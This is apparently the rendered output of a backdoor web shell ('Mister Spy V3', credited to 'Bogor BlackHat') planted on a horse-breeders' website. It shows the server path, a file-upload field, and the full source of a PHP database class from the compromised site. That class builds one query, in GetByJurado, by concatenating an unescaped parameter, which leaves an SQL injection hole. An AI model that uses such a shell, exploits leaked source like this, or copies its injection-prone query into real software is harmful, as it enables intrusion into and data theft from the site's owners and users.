Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/www/espanol/library/
Upload File :
Current File : /home/caballoscriollos/www/espanol/library/class.juradospruebascategorias.php

<?php 

require_once('class.dbaccess.php');
require_once('class.jurado.php');
require_once('class.filter.php');
require_once('class.page.php');

class JuradosPruebasCategorias extends DBAccess implements IFilterable
{
	public function ParseFilter(array $filter)
	{
		$sql = '';
		
		$sql.= " WHERE IdJurado LIKE '%" . DB::Number($filter['IdJurado']) . "%'";
		
		return $sql;
	}


	public function GetPagesCount(Page $oPage, $filter = false)
	{	
		$sql = "SELECT COUNT(1) / " . DB::Number($oPage->Size) . " AS Count ";
		$sql.= " FROM tblJuradosPruebasCategorias ";
		
		if ($filter)
			$sql.= " " . $this->ParseFilter($filter);
		
		if (!($oRes = $this->GetQuery($sql)) )		
			return false;

		if ( !($oRow = $oRes->GetRow()) )
			return false;
		
		$Count = $oRow['Count'];
		
		return ceil($Count);
	}


	public function GetAll(array $filter = NULL, Page $oPage = NULL)
	{
		$sql = "SELECT *";
		$sql.= " FROM tblJuradosPruebasCategorias ";

		if ($filter)
			$sql.= $this->ParseFilter($filter);

		$sql.= " ORDER BY IdJuradosPruebasCategoria ";

		if ($oPage != NULL)
			$sql.= " " . Pageable::ParsePage($oPage);
						
		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		$arr = array();
			
		while ($oRow = $oRes->GetRow())	
		{	
			$oJuradosPruebasCategoria = new JuradosPruebasCategoria();
			$oJuradosPruebasCategoria->ParseFromArray($oRow);
			
			array_push($arr, $oJuradosPruebasCategoria);
			
			$oRes->MoveNext();
		}	
		
		return $arr;		
	}

	public function GetById($IdJuradosPruebasCategoria)
	{
		$sql = "SELECT *";
		$sql.= " FROM tblJuradosPruebasCategorias ";
		$sql.= " WHERE IdJuradosPruebasCategoria = " . DB::Number($IdJuradosPruebasCategoria);	
			
		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		if (!($oRow = $oRes->GetRow()))
			return false;
		
		$oJuradosPruebasCategoria = new JuradosPruebasCategoria();
		$oJuradosPruebasCategoria->ParseFromArray($oRow);
		
		return $oJuradosPruebasCategoria;		
	}
	
	public function GetByJurado($IdJurado)
	{
		$sql = "SELECT *";
		$sql.= " FROM tblJuradosPruebasCategorias ";
		$sql.= " WHERE IdJurado = ".$IdJurado;

		if ($oPage != NULL)
			$sql.= " " . Pageable::ParsePage($oPage);

		if (!($oRes = $this->GetQuery($sql)))
			return false;

		$arr = array();

		while ($oRow = $oRes->GetRow())	
		{	
			$oJuradosPruebasCategoria = new JuradosPruebasCategoria();
			$oJuradosPruebasCategoria->ParseFromArray($oRow);
			
			array_push($arr, $oJuradosPruebasCategoria);

			$oRes->MoveNext();
		}	

		return $arr;		
	}

	public function GetByJuradoCategoria($IdJurado, $IdEventosFuncionalesPruebasCategoria)
	{
		$sql = "SELECT *";
		$sql.= " FROM tblJuradosPruebasCategorias ";
		$sql.= " WHERE IdJurado = " . DB::Number($IdJurado);
		$sql.= " AND IdEventosFuncionalesPruebasCategoria = " . DB::Number($IdEventosFuncionalesPruebasCategoria);

		if (!($oRes = $this->GetQuery($sql)))
			return false;

		if (!($oRow = $oRes->GetRow()))
			return false;
		
		$oJuradosPruebasCategoria = new JuradosPruebasCategoria();
		$oJuradosPruebasCategoria->ParseFromArray($oRow);
		
		return $oJuradosPruebasCategoria;		
	}

	public function GetCountRows(array $filter = NULL)
	{
		$sql = "SELECT *";
		$sql.= " FROM tblJuradosPruebasCategorias ";

		if ($filter)
			$sql.= $this->ParseFilter($filter);

		$sql.= " ORDER BY IdJuradosPruebasCategoria ";
		
		if (!($oRes = $this->GetQuery($sql)))
			return false;
		
		$CountRows = $oRes->NumRows();
		
		return $CountRows;
	}

	public function Create(JuradosPruebasCategoria $oJuradosPruebasCategoria)
	{
		$arr = array(
						'IdJurado' 									=> DB::Number($oJuradosPruebasCategoria->IdJurado),
						'IdEventosFuncionalesPrueba'				=> DB::Number($oJuradosPruebasCategoria->IdEventosFuncionalesPrueba),
						'IdEventosFuncionalesPruebasCategoria'  	=> DB::Number($oJuradosPruebasCategoria->IdEventosFuncionalesPruebasCategoria)
		);

		if (!$this->Insert('tblJuradosPruebasCategorias', $arr))
			return false;
			
		return $oJuradosPruebasCategoria;
	}
	
	
	public function Update(JuradosPruebasCategoria $oJuradosPruebasCategoria)
	{
		$where = " IdJuradosPruebasCategoria = " . DB::Number($oJuradosPruebasCategoria->IdJuradosPruebasCategoria);
		
		$arr = array(
						'IdJuradosPruebasCategoria'						=> DB::Number($oJuradosPruebasCategoria->IdJuradosPruebasCategoria),
						'IdJurado' 										=> DB::Number($oJuradosPruebasCategoria->IdJurado),
						'IdJuradosEventosFuncionalesPrueba'				=> DB::Number($oJuradosPruebasCategoria->IdJuradosEventosFuncionalesPrueba),
						'IdJuradosEventosFuncionalesPruebasCategoria'  	=> DB::Number($oJuradosPruebasCategoria->IdJuradosEventosFuncionalesPruebasCategoria)
		);		
		
		if (!DBAccess::Update('tblJuradosPruebasCategorias', $arr, $where))
			return false;
		
		return $oJuradosPruebasCategoria;
	}
	
	public function Delete($IdJuradosPruebasCategoria)
	{
		if (!DBAccess::$db->Begin())
			return false;
			
		$where = " IdJuradosPruebasCategoria = " . DB::Number($IdJuradosPruebasCategoria);
		if (!DBAccess::Delete('tblJuradosPruebasCategorias', $where))
		{
				DBAccess::$db->Rollback();	
				return false;
		}

		DBAccess::$db->Commit();
		
		return true;	
	}		
}

?>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat